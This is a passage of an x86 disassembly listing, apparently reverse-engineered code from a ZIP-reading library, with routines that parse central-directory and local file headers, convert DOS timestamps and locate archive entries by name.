; ---------------------------------------------------------------------------
loc_40EC3B: ; CODE XREF: sub_40EA92+197�j
mov edx, [ebp+arg_0]
mov [ebp+var_9C], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
add ecx, [eax+0Ch]
mov edx, [ebp+var_78]
add edx, [ebp+var_7C]
sub ecx, edx
mov [ebp+var_90], ecx
mov eax, [ebp+var_10]
mov [ebp+var_80], eax
mov [ebp+var_20], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+0Ch], 0
push 80h
call dword_4131C8 ; malloc
add esp, 4
mov [ebp+var_C], eax
mov ecx, 20h
lea esi, [ebp+var_9C]
mov edi, [ebp+var_C]
rep movsd
mov edx, [ebp+var_C]
push edx
call sub_40F1E3
add esp, 4
mov eax, [ebp+var_C]
loc_40ECA2: ; CODE XREF: sub_40EA92+13�j
; sub_40EA92+32�j ...
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_40EA92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECA8 proc near ; CODE XREF: sub_410CC8+36�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_40ECB9
mov eax, 0FFFFFF9Ah
jmp short loc_40ECF7
; ---------------------------------------------------------------------------
loc_40ECB9: ; CODE XREF: sub_40ECA8+8�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+7Ch], 0
jz short loc_40ECD4
mov edx, [ebp+arg_0]
push edx
call sub_40FCA7
add esp, 4
loc_40ECD4: ; CODE XREF: sub_40ECA8+1E�j
mov eax, [ebp+var_4]
mov ecx, [eax]
push ecx
call sub_40E48B
add esp, 4
cmp [ebp+var_4], 0
jz short loc_40ECF5
mov edx, [ebp+var_4]
push edx
call dword_4131D4 ; free
add esp, 4
loc_40ECF5: ; CODE XREF: sub_40ECA8+3E�j
xor eax, eax
loc_40ECF7: ; CODE XREF: sub_40ECA8+F�j
mov esp, ebp
pop ebp
retn
sub_40ECA8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jnz short loc_40ED0C
mov eax, 0FFFFFF9Ah
jmp short loc_40ED25
; ---------------------------------------------------------------------------
loc_40ED0C: ; CODE XREF: HSho:0040ED03�j
mov eax, [ebp+8]
mov [ebp-4], eax
mov ecx, [ebp-4]
mov edx, [ecx+4]
mov eax, [ecx+8]
mov ecx, [ebp+0Ch]
mov [ecx], edx
mov [ecx+4], eax
xor eax, eax
loc_40ED25: ; CODE XREF: HSho:0040ED0A�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED29 proc near ; CODE XREF: sub_40EDA2+122�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
shr eax, 10h
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
and ecx, 1Fh
mov edx, [ebp+arg_4]
mov [edx+0Ch], ecx
mov eax, [ebp+var_4]
and eax, 1E0h
shr eax, 5
sub eax, 1
mov ecx, [ebp+arg_4]
mov [ecx+10h], eax
mov edx, [ebp+var_4]
and edx, 0FE00h
shr edx, 9
add edx, 7BCh
mov eax, [ebp+arg_4]
mov [eax+14h], edx
mov ecx, [ebp+arg_0]
and ecx, 0F800h
shr ecx, 0Bh
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
and eax, 7E0h
shr eax, 5
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
and edx, 1Fh
shl edx, 1
mov eax, [ebp+arg_4]
mov [eax], edx
mov esp, ebp
pop ebp
retn
sub_40ED29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDA2 proc near ; CODE XREF: sub_40F1B4+25�p
; sub_40F1E3+4D�p ...
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_5C = byte ptr -5Ch
var_58 = byte ptr -58h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4C = byte ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 70h
push esi
push edi
mov [ebp+var_C], 0
mov [ebp+var_4], 0
cmp [ebp+arg_0], 0
jnz short loc_40EDC8
mov eax, 0FFFFFF9Ah
jmp loc_40F1AE
; ---------------------------------------------------------------------------
loc_40EDC8: ; CODE XREF: sub_40EDA2+1A�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
push 0
mov ecx, [ebp+var_10]
mov edx, [ecx+14h]
mov eax, [ebp+var_10]
add edx, [eax+0Ch]
push edx
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_40E53B
add esp, 0Ch
test eax, eax
jz short loc_40EDF6
mov [ebp+var_C], 0FFFFFFFFh
loc_40EDF6: ; CODE XREF: sub_40EDA2+4B�j
cmp [ebp+var_C], 0
jnz short loc_40EE2B
lea eax, [ebp+var_14]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EE1B
mov [ebp+var_C], 0FFFFFFFFh
jmp short loc_40EE2B
; ---------------------------------------------------------------------------
loc_40EE1B: ; CODE XREF: sub_40EDA2+6E�j
cmp [ebp+var_14], 2014B50h
jz short loc_40EE2B
mov [ebp+var_C], 0FFFFFF99h
loc_40EE2B: ; CODE XREF: sub_40EDA2+58�j
; sub_40EDA2+77�j ...
lea eax, [ebp+var_64]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EE48
mov [ebp+var_C], 0FFFFFFFFh
loc_40EE48: ; CODE XREF: sub_40EDA2+9D�j
lea eax, [ebp+var_60]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EE65
mov [ebp+var_C], 0FFFFFFFFh
loc_40EE65: ; CODE XREF: sub_40EDA2+BA�j
lea eax, [ebp+var_5C]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EE82
mov [ebp+var_C], 0FFFFFFFFh
loc_40EE82: ; CODE XREF: sub_40EDA2+D7�j
lea eax, [ebp+var_58]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EE9F
mov [ebp+var_C], 0FFFFFFFFh
loc_40EE9F: ; CODE XREF: sub_40EDA2+F4�j
lea eax, [ebp+var_54]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EEBC
mov [ebp+var_C], 0FFFFFFFFh
loc_40EEBC: ; CODE XREF: sub_40EDA2+111�j
lea eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_54]
push ecx
call sub_40ED29
add esp, 8
lea edx, [ebp+var_50]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EEE9
mov [ebp+var_C], 0FFFFFFFFh
loc_40EEE9: ; CODE XREF: sub_40EDA2+13E�j
lea edx, [ebp+var_4C]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EF06
mov [ebp+var_C], 0FFFFFFFFh
loc_40EF06: ; CODE XREF: sub_40EDA2+15B�j
lea edx, [ebp+var_48]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EF23
mov [ebp+var_C], 0FFFFFFFFh
loc_40EF23: ; CODE XREF: sub_40EDA2+178�j
lea edx, [ebp+var_44]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EF40
mov [ebp+var_C], 0FFFFFFFFh
loc_40EF40: ; CODE XREF: sub_40EDA2+195�j
lea edx, [ebp+var_40]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EF5D
mov [ebp+var_C], 0FFFFFFFFh
loc_40EF5D: ; CODE XREF: sub_40EDA2+1B2�j
lea edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EF7A
mov [ebp+var_C], 0FFFFFFFFh
loc_40EF7A: ; CODE XREF: sub_40EDA2+1CF�j
lea edx, [ebp+var_38]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EF97
mov [ebp+var_C], 0FFFFFFFFh
loc_40EF97: ; CODE XREF: sub_40EDA2+1EC�j
lea edx, [ebp+var_34]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40EFB4
mov [ebp+var_C], 0FFFFFFFFh
loc_40EFB4: ; CODE XREF: sub_40EDA2+209�j
lea edx, [ebp+var_30]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EFD1
mov [ebp+var_C], 0FFFFFFFFh
loc_40EFD1: ; CODE XREF: sub_40EDA2+226�j
lea edx, [ebp+var_8]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40EFEE
mov [ebp+var_C], 0FFFFFFFFh
loc_40EFEE: ; CODE XREF: sub_40EDA2+243�j
mov edx, [ebp+var_4]
add edx, [ebp+var_44]
mov [ebp+var_4], edx
cmp [ebp+var_C], 0
jnz short loc_40F05B
cmp [ebp+arg_C], 0
jz short loc_40F05B
mov eax, [ebp+var_44]
cmp eax, [ebp+arg_10]
jnb short loc_40F01C
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_44]
mov byte ptr [ecx], 0
mov edx, [ebp+var_44]
mov [ebp+var_68], edx
jmp short loc_40F022
; ---------------------------------------------------------------------------
loc_40F01C: ; CODE XREF: sub_40EDA2+267�j
mov eax, [ebp+arg_10]
mov [ebp+var_68], eax
loc_40F022: ; CODE XREF: sub_40EDA2+278�j
cmp [ebp+var_44], 0
jbe short loc_40F052
cmp [ebp+arg_10], 0
jbe short loc_40F052
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
push 1
mov eax, [ebp+var_68]
push eax
mov ecx, [ebp+arg_C]
push ecx
call sub_40E610
add esp, 10h
cmp eax, 1
jz short loc_40F052
mov [ebp+var_C], 0FFFFFFFFh
loc_40F052: ; CODE XREF: sub_40EDA2+284�j
; sub_40EDA2+28A�j ...
mov edx, [ebp+var_4]
sub edx, [ebp+var_68]
mov [ebp+var_4], edx
loc_40F05B: ; CODE XREF: sub_40EDA2+259�j
; sub_40EDA2+25F�j
cmp [ebp+var_C], 0
jnz loc_40F0F3
cmp [ebp+arg_14], 0
jz loc_40F0F3
mov eax, [ebp+var_40]
cmp eax, [ebp+arg_18]
jnb short loc_40F07F
mov ecx, [ebp+var_40]
mov [ebp+var_6C], ecx
jmp short loc_40F085
; ---------------------------------------------------------------------------
loc_40F07F: ; CODE XREF: sub_40EDA2+2D3�j
mov edx, [ebp+arg_18]
mov [ebp+var_6C], edx
loc_40F085: ; CODE XREF: sub_40EDA2+2DB�j
cmp [ebp+var_4], 0
jz short loc_40F0B3
push 1
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_40E53B
add esp, 0Ch
test eax, eax
jnz short loc_40F0AC
mov [ebp+var_4], 0
jmp short loc_40F0B3
; ---------------------------------------------------------------------------
loc_40F0AC: ; CODE XREF: sub_40EDA2+2FF�j
mov [ebp+var_C], 0FFFFFFFFh
loc_40F0B3: ; CODE XREF: sub_40EDA2+2E7�j
; sub_40EDA2+308�j
cmp [ebp+var_40], 0
jbe short loc_40F0E3
cmp [ebp+arg_18], 0
jbe short loc_40F0E3
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
push 1
mov edx, [ebp+var_6C]
push edx
mov eax, [ebp+arg_14]
push eax
call sub_40E610
add esp, 10h
cmp eax, 1
jz short loc_40F0E3
mov [ebp+var_C], 0FFFFFFFFh
loc_40F0E3: ; CODE XREF: sub_40EDA2+315�j
; sub_40EDA2+31B�j ...
mov ecx, [ebp+var_40]
sub ecx, [ebp+var_6C]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
jmp short loc_40F0FC
; ---------------------------------------------------------------------------
loc_40F0F3: ; CODE XREF: sub_40EDA2+2BD�j
; sub_40EDA2+2C7�j
mov eax, [ebp+var_4]
add eax, [ebp+var_40]
mov [ebp+var_4], eax
loc_40F0FC: ; CODE XREF: sub_40EDA2+34F�j
cmp [ebp+var_C], 0
jnz short loc_40F17E
cmp [ebp+arg_1C], 0
jz short loc_40F17E
mov ecx, [ebp+var_3C]
cmp ecx, [ebp+arg_20]
jnb short loc_40F121
mov edx, [ebp+arg_1C]
add edx, [ebp+var_3C]
mov byte ptr [edx], 0
mov eax, [ebp+var_3C]
mov [ebp+var_70], eax
jmp short loc_40F127
; ---------------------------------------------------------------------------
loc_40F121: ; CODE XREF: sub_40EDA2+36C�j
mov ecx, [ebp+arg_20]
mov [ebp+var_70], ecx
loc_40F127: ; CODE XREF: sub_40EDA2+37D�j
cmp [ebp+var_4], 0
jz short loc_40F14E
push 1
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_40E53B
add esp, 0Ch
test eax, eax
jnz short loc_40F147
jmp short loc_40F14E
; ---------------------------------------------------------------------------
loc_40F147: ; CODE XREF: sub_40EDA2+3A1�j
mov [ebp+var_C], 0FFFFFFFFh
loc_40F14E: ; CODE XREF: sub_40EDA2+389�j
; sub_40EDA2+3A3�j
cmp [ebp+var_3C], 0
jbe short loc_40F17E
cmp [ebp+arg_20], 0
jbe short loc_40F17E
mov edx, [ebp+var_10]
mov eax, [edx]
push eax
push 1
mov ecx, [ebp+var_70]
push ecx
mov edx, [ebp+arg_1C]
push edx
call sub_40E610
add esp, 10h
cmp eax, 1
jz short loc_40F17E
mov [ebp+var_C], 0FFFFFFFFh
loc_40F17E: ; CODE XREF: sub_40EDA2+35E�j
; sub_40EDA2+364�j ...
cmp [ebp+var_C], 0
jnz short loc_40F197
cmp [ebp+arg_4], 0
jz short loc_40F197
mov ecx, 14h
lea esi, [ebp+var_64]
mov edi, [ebp+arg_4]
rep movsd
loc_40F197: ; CODE XREF: sub_40EDA2+3E0�j
; sub_40EDA2+3E6�j
cmp [ebp+var_C], 0
jnz short loc_40F1AB
cmp [ebp+arg_8], 0
jz short loc_40F1AB
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_8]
mov [eax], ecx
loc_40F1AB: ; CODE XREF: sub_40EDA2+3F9�j
; sub_40EDA2+3FF�j
mov eax, [ebp+var_C]
loc_40F1AE: ; CODE XREF: sub_40EDA2+21�j
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_40EDA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F1B4 proc near ; CODE XREF: sub_40F30A+BB�p
; sub_40FF4C+194�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, [ebp+arg_1C]
push eax
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40EDA2
add esp, 24h
pop ebp
retn
sub_40F1B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F1E3 proc near ; CODE XREF: sub_40EA92+205�p
; sub_40F30A+8A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_40F1F6
mov eax, 0FFFFFF9Ah
jmp short loc_40F24D
; ---------------------------------------------------------------------------
loc_40F1F6: ; CODE XREF: sub_40F1E3+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [edx+24h]
mov [ecx+14h], eax
mov ecx, [ebp+var_8]
mov dword ptr [ecx+10h], 0
push 0
push 0
push 0
push 0
push 0
push 0
mov edx, [ebp+var_8]
add edx, 78h
push edx
mov eax, [ebp+var_8]
add eax, 28h
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_40EDA2
add esp, 24h
mov [ebp+var_4], eax
xor edx, edx
cmp [ebp+var_4], 0
setz dl
mov eax, [ebp+var_8]
mov [eax+18h], edx
mov eax, [ebp+var_4]
loc_40F24D: ; CODE XREF: sub_40F1E3+11�j
mov esp, ebp
pop ebp
retn
sub_40F1E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F251 proc near ; CODE XREF: sub_40F30A+E9�p
; sub_40FF4C+169�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_40F267
mov eax, 0FFFFFF9Ah
jmp loc_40F306
; ---------------------------------------------------------------------------
loc_40F267: ; CODE XREF: sub_40F251+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+18h], 0
jnz short loc_40F280
mov eax, 0FFFFFF9Ch
jmp loc_40F306
; ---------------------------------------------------------------------------
loc_40F280: ; CODE XREF: sub_40F251+23�j
mov edx, [ebp+var_8]
mov eax, [edx+10h]
add eax, 1
mov ecx, [ebp+var_8]
cmp eax, [ecx+4]
jnz short loc_40F298
mov eax, 0FFFFFF9Ch
jmp short loc_40F306
; ---------------------------------------------------------------------------
loc_40F298: ; CODE XREF: sub_40F251+3E�j
mov edx, [ebp+var_8]
mov eax, [edx+48h]
mov ecx, [ebp+var_8]
mov edx, [ecx+4Ch]
lea eax, [eax+edx+2Eh]
mov ecx, [ebp+var_8]
add eax, [ecx+50h]
mov edx, [ebp+var_8]
mov ecx, [edx+14h]
add ecx, eax
mov edx, [ebp+var_8]
mov [edx+14h], ecx
mov eax, [ebp+var_8]
mov ecx, [eax+10h]
add ecx, 1
mov edx, [ebp+var_8]
mov [edx+10h], ecx
push 0
push 0
push 0
push 0
push 0
push 0
mov eax, [ebp+var_8]
add eax, 78h
push eax
mov ecx, [ebp+var_8]
add ecx, 28h
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_40EDA2
add esp, 24h
mov [ebp+var_4], eax
xor eax, eax
cmp [ebp+var_4], 0
setz al
mov ecx, [ebp+var_8]
mov [ecx+18h], eax
mov eax, [ebp+var_4]
loc_40F306: ; CODE XREF: sub_40F251+11�j
; sub_40F251+2A�j ...
mov esp, ebp
pop ebp
retn
sub_40F251 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F30A proc near ; CODE XREF: sub_4105D7+25�p
var_218 = byte ptr -218h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 218h
cmp [ebp+arg_0], 0
jnz short loc_40F323
mov eax, 0FFFFFF9Ah
jmp loc_40F427
; ---------------------------------------------------------------------------
loc_40F323: ; CODE XREF: sub_40F30A+D�j
mov eax, [ebp+arg_4]
push eax
call sub_41162E ; strlen
add esp, 4
cmp eax, 100h
jb short loc_40F340
mov eax, 0FFFFFF9Ah
jmp loc_40F427
; ---------------------------------------------------------------------------
loc_40F340: ; CODE XREF: sub_40F30A+2A�j
mov ecx, [ebp+arg_4]
push ecx
lea edx, [ebp+var_104]
push edx
call sub_411628 ; strcpy
add esp, 8
mov eax, [ebp+arg_0]
mov [ebp+var_10C], eax
mov ecx, [ebp+var_10C]
cmp dword ptr [ecx+18h], 0
jnz short loc_40F372
mov eax, 0FFFFFF9Ch
jmp loc_40F427
; ---------------------------------------------------------------------------
loc_40F372: ; CODE XREF: sub_40F30A+5C�j
mov edx, [ebp+var_10C]
mov eax, [edx+10h]
mov [ebp+var_110], eax
mov ecx, [ebp+var_10C]
mov edx, [ecx+14h]
mov [ebp+var_114], edx
mov eax, [ebp+arg_0]
push eax
call sub_40F1E3
add esp, 4
mov [ebp+var_108], eax
loc_40F3A2: ; CODE XREF: sub_40F30A+F7�j
cmp [ebp+var_108], 0
jnz short loc_40F403
push 0
push 0
push 0
push 0
push 100h
lea ecx, [ebp+var_218]
push ecx
push 0
mov edx, [ebp+arg_0]
push edx
call sub_40F1B4
add esp, 20h
mov eax, [ebp+arg_8]
push eax
lea ecx, [ebp+var_104]
push ecx
lea edx, [ebp+var_218]
push edx
call sub_40E8D4
add esp, 0Ch
test eax, eax
jnz short loc_40F3EF
xor eax, eax
jmp short loc_40F427
; ---------------------------------------------------------------------------
loc_40F3EF: ; CODE XREF: sub_40F30A+DF�j
mov eax, [ebp+arg_0]
push eax
call sub_40F251
add esp, 4
mov [ebp+var_108], eax
jmp short loc_40F3A2
; ---------------------------------------------------------------------------
loc_40F403: ; CODE XREF: sub_40F30A+9F�j
mov ecx, [ebp+var_10C]
mov edx, [ebp+var_110]
mov [ecx+10h], edx
mov eax, [ebp+var_10C]
mov ecx, [ebp+var_114]
mov [eax+14h], ecx
mov eax, [ebp+var_108]
loc_40F427: ; CODE XREF: sub_40F30A+14�j
; sub_40F30A+31�j ...
mov esp, ebp
pop ebp
retn
sub_40F30A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F42B proc near ; CODE XREF: sub_40F6B0+54�p
; sub_40FF4C+1B4�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_4], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax], 0
mov ecx, [ebp+arg_8]
mov dword ptr [ecx], 0
mov edx, [ebp+arg_C]
mov dword ptr [edx], 0
push 0
mov eax, [ebp+arg_0]
mov ecx, [eax+78h]
mov edx, [ebp+arg_0]
add ecx, [edx+0Ch]
push ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_40E53B
add esp, 0Ch
test eax, eax
jz short loc_40F47C
or eax, 0FFFFFFFFh
jmp loc_40F6AC
; ---------------------------------------------------------------------------
loc_40F47C: ; CODE XREF: sub_40F42B+47�j
cmp [ebp+var_4], 0
jnz short loc_40F4B1
lea edx, [ebp+var_10]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40F4A1
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_40F4B1
; ---------------------------------------------------------------------------
loc_40F4A1: ; CODE XREF: sub_40F42B+6B�j
cmp [ebp+var_10], 4034B50h
jz short loc_40F4B1
mov [ebp+var_4], 0FFFFFF99h
loc_40F4B1: ; CODE XREF: sub_40F42B+55�j
; sub_40F42B+74�j ...
lea edx, [ebp+var_18]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40F4CE
mov [ebp+var_4], 0FFFFFFFFh
loc_40F4CE: ; CODE XREF: sub_40F42B+9A�j
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40F4EB
mov [ebp+var_4], 0FFFFFFFFh
loc_40F4EB: ; CODE XREF: sub_40F42B+B7�j
lea edx, [ebp+var_18]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40F50A
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_40F522
; ---------------------------------------------------------------------------
loc_40F50A: ; CODE XREF: sub_40F42B+D4�j
cmp [ebp+var_4], 0
jnz short loc_40F522
mov edx, [ebp+arg_0]
mov eax, [ebp+var_18]
cmp eax, [edx+34h]
jz short loc_40F522
mov [ebp+var_4], 0FFFFFF99h
loc_40F522: ; CODE XREF: sub_40F42B+DD�j
; sub_40F42B+E3�j ...
cmp [ebp+var_4], 0
jnz short loc_40F541
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+34h], 0
jz short loc_40F541
mov edx, [ebp+arg_0]
cmp dword ptr [edx+34h], 8
jz short loc_40F541
mov [ebp+var_4], 0FFFFFF99h
loc_40F541: ; CODE XREF: sub_40F42B+FB�j
; sub_40F42B+104�j ...
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40F55E
mov [ebp+var_4], 0FFFFFFFFh
loc_40F55E: ; CODE XREF: sub_40F42B+12A�j
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40F57D
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_40F59F
; ---------------------------------------------------------------------------
loc_40F57D: ; CODE XREF: sub_40F42B+147�j
cmp [ebp+var_4], 0
jnz short loc_40F59F
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
cmp ecx, [eax+3Ch]
jz short loc_40F59F
mov edx, [ebp+var_14]
and edx, 8
test edx, edx
jnz short loc_40F59F
mov [ebp+var_4], 0FFFFFF99h
loc_40F59F: ; CODE XREF: sub_40F42B+150�j
; sub_40F42B+156�j ...
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40F5BE
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_40F5E0
; ---------------------------------------------------------------------------
loc_40F5BE: ; CODE XREF: sub_40F42B+188�j
cmp [ebp+var_4], 0
jnz short loc_40F5E0
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
cmp ecx, [eax+40h]
jz short loc_40F5E0
mov edx, [ebp+var_14]
and edx, 8
test edx, edx
jnz short loc_40F5E0
mov [ebp+var_4], 0FFFFFF99h
loc_40F5E0: ; CODE XREF: sub_40F42B+191�j
; sub_40F42B+197�j ...
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_40E774
add esp, 8
test eax, eax
jz short loc_40F5FF
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_40F621
; ---------------------------------------------------------------------------
loc_40F5FF: ; CODE XREF: sub_40F42B+1C9�j
cmp [ebp+var_4], 0
jnz short loc_40F621
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
cmp ecx, [eax+44h]
jz short loc_40F621
mov edx, [ebp+var_14]
and edx, 8
test edx, edx
jnz short loc_40F621
mov [ebp+var_4], 0FFFFFF99h
loc_40F621: ; CODE XREF: sub_40F42B+1D2�j
; sub_40F42B+1D8�j ...
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40F640
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_40F658
; ---------------------------------------------------------------------------
loc_40F640: ; CODE XREF: sub_40F42B+20A�j
cmp [ebp+var_4], 0
jnz short loc_40F658
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
cmp ecx, [eax+48h]
jz short loc_40F658
mov [ebp+var_4], 0FFFFFF99h
loc_40F658: ; CODE XREF: sub_40F42B+213�j
; sub_40F42B+219�j ...
mov edx, [ebp+arg_4]
mov eax, [edx]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [ecx], eax
lea edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_40E70E
add esp, 8
test eax, eax
jz short loc_40F682
mov [ebp+var_4], 0FFFFFFFFh
loc_40F682: ; CODE XREF: sub_40F42B+24E�j
mov edx, [ebp+arg_0]
